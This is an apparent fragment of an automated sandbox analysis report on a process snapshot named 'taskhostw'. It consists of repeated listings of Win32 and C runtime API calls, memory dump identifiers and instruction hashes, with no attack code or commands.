                                                                  • _free.LIBCMT ref: 00218DE7
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                  • String ID:
                                                                  • API String ID: 776569668-0
                                                                  • Opcode ID: da83f3a9c8313d5dba728f7a15bdec3741db116714464bd9b18197c9301ee2d0
                                                                  • Instruction ID: 3ede0245de42be925559522ad67d3c83e17e50e70c5d0110b39a056d5b9bcaab
                                                                  • Opcode Fuzzy Hash: da83f3a9c8313d5dba728f7a15bdec3741db116714464bd9b18197c9301ee2d0
                                                                  • Instruction Fuzzy Hash: 7AE012A161170643CA24697C7980ED313DC5F78361714081EF519D76C2DF74E8D18164
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: CALL
                                                                  • API String ID: 0-4196123274
                                                                  • Opcode ID: e02818e73d6560a63a0dca8d937cec0e0f371b5b02174f2aa789a66b4552d6ba
                                                                  • Instruction ID: 8344327136ffa5dd8261c8df13f21e0732255e966774b647e969348113d18766
                                                                  • Opcode Fuzzy Hash: e02818e73d6560a63a0dca8d937cec0e0f371b5b02174f2aa789a66b4552d6ba
                                                                  • Instruction Fuzzy Hash: 8A2258705083418FCB29DF14C494BAABBE1BF98304F55895DF99A8B362D771EC85CB82
                                                                  APIs
                                                                  • IsThemeActive.UXTHEME ref: 001B4992
                                                                    • Part of subcall function 001D34EC: __lock.LIBCMT ref: 001D34F2
                                                                    • Part of subcall function 001D34EC: DecodePointer.KERNEL32(00000001,?,001B49A7,00207F9C), ref: 001D34FE
                                                                    • Part of subcall function 001D34EC: EncodePointer.KERNEL32(?,?,001B49A7,00207F9C), ref: 001D3509
                                                                    • Part of subcall function 001B4A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000,00000000,?,008FA450,?,001B49BA), ref: 001B4A73
                                                                    • Part of subcall function 001B4A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002,?,008FA450,?,001B49BA), ref: 001B4A88
                                                                    • Part of subcall function 001B3B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 001B3B7A
                                                                    • Part of subcall function 001B3B4C: IsDebuggerPresent.KERNEL32 ref: 001B3B8C
                                                                    • Part of subcall function 001B3B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,002752F8,002752E0,?,?), ref: 001B3BFD
                                                                    • Part of subcall function 001B3B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 001B3C81
                                                                  • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 001B49D2
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                  • String ID:
                                                                  • API String ID: 1438897964-0
                                                                  • Opcode ID: 4c2f0569c91908bcab8135ed682b816114105f990f6e796b614fd0e5bedc2bce
                                                                  • Instruction ID: 8243c40cb6c557789542dc694344a2ec28ed51ffb0469403095145be7997462d
                                                                  • Opcode Fuzzy Hash: 4c2f0569c91908bcab8135ed682b816114105f990f6e796b614fd0e5bedc2bce
                                                                  • Instruction Fuzzy Hash: 9A119D719143219FC310EF38EC4994AFBE8EF98710F00891EF559932B2DBB09585CB92
                                                                  APIs
                                                                  • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 001B5E27
                                                                  • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000), ref: 001EE0CC
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: CreateFile
                                                                  • String ID:
                                                                  • API String ID: 823142352-0
                                                                  • Opcode ID: b7fae5b781fe6587b6297f18757e43045414e3dccdfcec5b577f4518e838e070
                                                                  • Instruction ID: cd7504e01ea028a9e07cfa485965c26b0ebb2052ad7236053fddf262a7d53b62
                                                                  • Opcode Fuzzy Hash: b7fae5b781fe6587b6297f18757e43045414e3dccdfcec5b577f4518e838e070
                                                                  • Instruction Fuzzy Hash: 4F018070244608BEF7250F24DC8AFA67A9DAB05768F108219FAE56A1E0C7B15E458B10
                                                                  APIs
                                                                    • Part of subcall function 001D588C: __FF_MSGBANNER.LIBCMT ref: 001D58A3
                                                                    • Part of subcall function 001D588C: __NMSG_WRITE.LIBCMT ref: 001D58AA
                                                                    • Part of subcall function 001D588C: RtlAllocateHeap.NTDLL(008D0000,00000000,00000001,00000000,?,?,?,001D0F53,?), ref: 001D58CF
                                                                  • std::exception::exception.LIBCMT ref: 001D0F6C
                                                                  • __CxxThrowException@8.LIBCMT ref: 001D0F81
                                                                    • Part of subcall function 001D871B: RaiseException.KERNEL32(?,?,?,00269E78,00000000,?,?,?,?,001D0F86,?,00269E78,?,00000001), ref: 001D8770
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                  • String ID:
                                                                  • API String ID: 3902256705-0
                                                                  • Opcode ID: 9ded3fba06e4c27f2f5d938a979af0a4e0004eb9e332ef4c2bdc83cb9ec8f6c8
                                                                  • Instruction ID: d9d77d3081822bebbdbed275e5ea09ea79466ff87bbb8816771df02a9a7f1e10
                                                                  • Opcode Fuzzy Hash: 9ded3fba06e4c27f2f5d938a979af0a4e0004eb9e332ef4c2bdc83cb9ec8f6c8
                                                                  • Instruction Fuzzy Hash: B2F0F431804209A7CB25AB94EC01ADE7BAC9F14310F200467F908A6382DF71DAA4C2D1
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: __lock_file_memset
                                                                  • String ID:
                                                                  • API String ID: 26237723-0
                                                                  • Opcode ID: b82b72e04695591df0f7ac0680c1cc7caae316723ff5515a173ed817b3871ce5
                                                                  • Instruction ID: 778ebb88b3412de2b707c908252884a95c43bf6bfd9428e8a4cad05704aa3693
                                                                  • Opcode Fuzzy Hash: b82b72e04695591df0f7ac0680c1cc7caae316723ff5515a173ed817b3871ce5
                                                                  • Instruction Fuzzy Hash: F501A731901609EBCF21AF698C0149F7B73BF90360F644217F9245B351D7358A21DF91
                                                                  APIs
                                                                    • Part of subcall function 001D8CA8: __getptd_noexit.LIBCMT ref: 001D8CA8
                                                                  • __lock_file.LIBCMT ref: 001D555B
                                                                    • Part of subcall function 001D6D8E: __lock.LIBCMT ref: 001D6DB1
                                                                  • __fclose_nolock.LIBCMT ref: 001D5566
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                  • String ID:
                                                                  • API String ID: 2800547568-0
                                                                  • Opcode ID: 3c0be49af23e2ab2e26c9b76ee19e97c491a283bfac75a2d3109cf523133be2a
                                                                  • Instruction ID: f992251d93832779b07ad048bf4f0f81af4b0b3c6b8835f24b27884b26dc88e9
                                                                  • Opcode Fuzzy Hash: 3c0be49af23e2ab2e26c9b76ee19e97c491a283bfac75a2d3109cf523133be2a
                                                                  • Instruction Fuzzy Hash: 04F0B431911A009AD7216F75980276E6BA36F51335F15820BF424AB3C1CB7C49419F52
                                                                  APIs
                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,?,?,?,001B558F,?,?,?,?,?), ref: 001B81DA
                                                                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,?,?,001B558F,?,?,?,?,?), ref: 001B820D
                                                                    • Part of subcall function 001B78AD: _memmove.LIBCMT ref: 001B78E9
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWide$_memmove
                                                                  • String ID:
                                                                  • API String ID: 3033907384-0
                                                                  • Opcode ID: 5ee62b657602c0dc0a4ab594b521daf1849f10a2d6469a08fbe5e0d1913eff66
                                                                  • Instruction ID: 53a4ce08aa411a44ed9e3596cf1676d8bee8b0f28901eb7fda81e7b44a09f8b3
                                                                  • Opcode Fuzzy Hash: 5ee62b657602c0dc0a4ab594b521daf1849f10a2d6469a08fbe5e0d1913eff66
                                                                  • Instruction Fuzzy Hash: 23016D71205504BFEB256B25ED4AFBB7B6DEF99760F10802AF905CE2D1DB21D800D671
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5865f650b22a530acfd27975cd367d6f2961a14ad5c6bdd62bdab5afe6ec4846
                                                                  • Instruction ID: b48d48178bdd44152a2b041aa1da27dfa40963af81b40d4a6223e0a0fe91c957
                                                                  • Opcode Fuzzy Hash: 5865f650b22a530acfd27975cd367d6f2961a14ad5c6bdd62bdab5afe6ec4846
                                                                  • Instruction Fuzzy Hash: A061AD7060020A9FCB24EF64C881ABBB7F5EF49304F15857EE9169B291E771ED52CB50
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 668953b766a9b5accf1abe7d27db4bd95f9f6de7f3c738a54f0064d9bd36ce93
                                                                  • Instruction ID: 2c366f4a31a639b8c9c6079dad004b8d77ee4b7951d305a3991d6ee114c737d1
                                                                  • Opcode Fuzzy Hash: 668953b766a9b5accf1abe7d27db4bd95f9f6de7f3c738a54f0064d9bd36ce93
                                                                  • Instruction Fuzzy Hash: 82517E34600604AFCF14EF64C995FAE77A6AFA5314F15806CF946AB392CB30ED01CB51
                                                                  APIs
                                                                  • SetFilePointerEx.KERNEL32(?,?,00000001,00000000,00000000), ref: 001B5CF6
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: FilePointer
                                                                  • String ID:
                                                                  • API String ID: 973152223-0
                                                                  • Opcode ID: dbd156c9bd3b82b48f48bf949b963f38b6fd4acb11efbce21c72aefb511617d4
                                                                  • Instruction ID: 3de59564fdec9e7d90e182e9716206e110ff3f9a5f443b38979fb970cf44dcb3
                                                                  • Opcode Fuzzy Hash: dbd156c9bd3b82b48f48bf949b963f38b6fd4acb11efbce21c72aefb511617d4
                                                                  • Instruction Fuzzy Hash: CE313A71A00B49ABCB18DF69C484BADBBB6FF48310F158629E81993750D771B960DB90
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: ClearVariant
                                                                  • String ID:
                                                                  • API String ID: 1473721057-0
                                                                  • Opcode ID: ebeef6bd7a6d6b51c960aaea6185c78448ba7e2edaee8f20ac570a99efe50822
                                                                  • Instruction ID: 7e8ade4978d716dadbe83c7bd1c9b844738f263dbf633e10791af2cb3d1074f2
                                                                  • Opcode Fuzzy Hash: ebeef6bd7a6d6b51c960aaea6185c78448ba7e2edaee8f20ac570a99efe50822
                                                                  • Instruction Fuzzy Hash: CC413774508341CFDB25DF14C484B5ABBE1BF49318F1988ACE9998B762C772EC85CB52
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: _memmove
                                                                  • String ID:
                                                                  • API String ID: 4104443479-0
                                                                  • Opcode ID: 3767aed8bde2b6957c95f5e6b847ec4982c9a8e1ca3d8362503cbb36ecc64ede
                                                                  • Instruction ID: 890a86071b098a6b4e8c6c99297a8026a0e8fcfbee841c3c397989f1a6381d38
                                                                  • Opcode Fuzzy Hash: 3767aed8bde2b6957c95f5e6b847ec4982c9a8e1ca3d8362503cbb36ecc64ede
                                                                  • Instruction Fuzzy Hash: F7210531A00E18EBDB149F52F8857AE7FF9EF18350F21845AF486C5110EBB184D08745
                                                                  APIs
                                                                    • Part of subcall function 001B4D13: FreeLibrary.KERNEL32(00000000,?), ref: 001B4D4D
                                                                    • Part of subcall function 001D53CB: __wfsopen.LIBCMT ref: 001D53D6
                                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,002752F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 001B4F6F
                                                                    • Part of subcall function 001B4CC8: FreeLibrary.KERNEL32(00000000), ref: 001B4D02
                                                                    • Part of subcall function 001B4DD0: _memmove.LIBCMT ref: 001B4E1A
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: Library$Free$Load__wfsopen_memmove
                                                                  • String ID:
                                                                  • API String ID: 1396898556-0
                                                                  • Opcode ID: d855f64d6ba1d14df2d825fb626498e1e6a321e905821426dc0bdf10f5e448ca
                                                                  • Instruction ID: 1a19ace2efaa3b8b16ed0879d9f33b23b88b33f222cd003f502389b03fc6e732
                                                                  • Opcode Fuzzy Hash: d855f64d6ba1d14df2d825fb626498e1e6a321e905821426dc0bdf10f5e448ca
                                                                  • Instruction Fuzzy Hash: 6211C431610609BBCF14BF64D816BEE77A59F64700F20C82DF941A7182DBB19A159BA0
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: ClearVariant
                                                                  • String ID:
                                                                  • API String ID: 1473721057-0
                                                                  • Opcode ID: 0d35cf33cbee3719da8718a8823e93f09c0e47d9e7fa1c97ff4c007130806a22
                                                                  • Instruction ID: c2bb0d6fb7ee6d982ccfa920223b3d920ea5b8c6440aaa4b549348f5263e584c
                                                                  • Opcode Fuzzy Hash: 0d35cf33cbee3719da8718a8823e93f09c0e47d9e7fa1c97ff4c007130806a22
                                                                  • Instruction Fuzzy Hash: C72130B09083418FCB25DF14C884B5BBBE1BF88304F05896CE99A4B722D731E849CB92
                                                                  APIs
                                                                  • ReadFile.KERNEL32(?,?,00010000,?,00000000), ref: 001B5D76
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: FileRead
                                                                  • String ID:
                                                                  • API String ID: 2738559852-0
                                                                  • Opcode ID: e6127d9bb488a62d9aaac33e4b734ca1c172d68a6578498e26eb8c6aac136e2f
                                                                  • Instruction ID: c767088711eddce37ff7f378e15f063b33beba2656be6c76efc6a00898bbb8e0
                                                                  • Opcode Fuzzy Hash: e6127d9bb488a62d9aaac33e4b734ca1c172d68a6578498e26eb8c6aac136e2f
                                                                  • Instruction Fuzzy Hash: 81113631200B019FD3308F55D888BA2B7FAEF45764F10CA2EE5AA86A50D7B1E945CB60
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: _memmove
                                                                  • String ID:
                                                                  • API String ID: 4104443479-0
                                                                  • Opcode ID: 8e1bb85ac63864fbec019602ce91a61be3e0d1636a295fffd4c0df93f9d1a386
                                                                  • Instruction ID: 3955f212ec9cc225988ea4da8c556bcea16742896d1093dc757cfa599b64e979
                                                                  • Opcode Fuzzy Hash: 8e1bb85ac63864fbec019602ce91a61be3e0d1636a295fffd4c0df93f9d1a386
                                                                  • Instruction Fuzzy Hash: 57018FB5600942AFC305EB69D541E2AFBAAFF993107148159F819C7702D731EC22CBE0
                                                                  APIs
                                                                  • __lock_file.LIBCMT ref: 001D4A16
                                                                    • Part of subcall function 001D8CA8: __getptd_noexit.LIBCMT ref: 001D8CA8
                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.453516686.00000000001B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001B0000, based on PE: true
                                                                  • Associated: 0000000A.00000002.453510044.00000000001B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.000000000023F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453539067.0000000000264000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453552756.000000000026E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                  • Associated: 0000000A.00000002.453581886.0000000000277000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_10_2_1b0000_taskhostw.jbxd
                                                                  Similarity
                                                                  • API ID: __getptd_noexit__lock_file
                                                                  • String ID:
                                                                  • API String ID: 2597487223-0
                                                                  • Opcode ID: ed8dc3b6d7d5f955ea564293f38a6657a0578ae111dc2a036396b98a595d747a
